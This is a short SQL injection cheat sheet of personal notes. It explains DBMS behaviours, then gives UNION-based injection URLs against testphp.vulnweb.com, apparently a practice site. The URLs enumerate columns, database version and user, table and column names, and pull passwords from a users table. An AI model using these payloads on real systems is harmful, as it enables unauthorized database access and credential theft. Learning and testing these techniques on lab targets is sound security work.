SQLi and Cheat Sheet
It has been collected by compiling many sources. For personal notes purposes only.
SQL injection is the ability of attackers to execute their SQL queries using the web application. It may be necessary to briefly know the information about SQL and DBMS. The following SQL queries may return different results on different DBMS.
▪ SQL can perform arithmetic operations. Also, it can perform bitwise operations and many more.
SELECT 3–2;
The output: 1SELECT 2^1;
The output: 3
▪ The quotation mark specifies the string.
SELECT '3-2';
The output: 3-2▪ DBMS can do typecasting. However, it returns 0 when doing type casting for character values to integer values.
SELECT '3' - 'b';
The output: 3▪ DBMS does not trim() when inserting data, but it performs trim() when searching data in the database. If the exact match is not checked, it creates a vulnerability.
And much more functionality occurs in DBMS.
The goal should be to push the limits of the program with queries until a vulnerability is discovered. In the discovery part, an expected response or behavior should be selected as a base situation. If we can reach the base situation by performing our queries, this means that we can run queries in the database.
When we get into the exploitation part -after the discovery part-, the intent should be to write our SELECT queries. The best way to do that is to use the UNION operand. The most important limitation is that the number of columns should be equal in both SELECT queries.
http://testphp.vulnweb.com/listproducts.php?cat=1%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11orhttp://testphp.vulnweb.com/listproducts.php?cat=1%20UNION%20SELECT%20null,null,null,null,null,null,null,null,null,null,null
If we want to see only our response after the SQL query, we need to give a value that will return the empty result to the parameter that contains a vulnerability.
http://testphp.vulnweb.com/listproducts.php?cat=-9999999%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11Also, you can run SQL helper functions on vulnerable parameters.
http://testphp.vulnweb.com/listproducts.php?cat=-9999999%20UNION%20SELECT%201,version(),3,4,5,6,database(),8,9,10,user()We can easily view it by using the codes that the databases’ workbenches use to pull the data from the database.
http://testphp.vulnweb.com/listproducts.php?cat=-99%20UNION%20SELECT%201,version(),3,4,5,6,table_name,8,9,10,%2011%20%20FROM%20information_schema.tables%20WHERE%20table_schema%20=%20database()http://testphp.vulnweb.com/listproducts.php?cat=-99%20UNION%20SELECT%201,version(),3,4,5,6,column_name,8,9,10,11%20FROM%20information_schema.columns%20WHERE%20table_name%20=%20%27users%27http://testphp.vulnweb.com/listproducts.php?cat=-99%20UNION%20SELECT%201,version(),3,4,5,6,pass,8,9,10,11%20FROM%20users
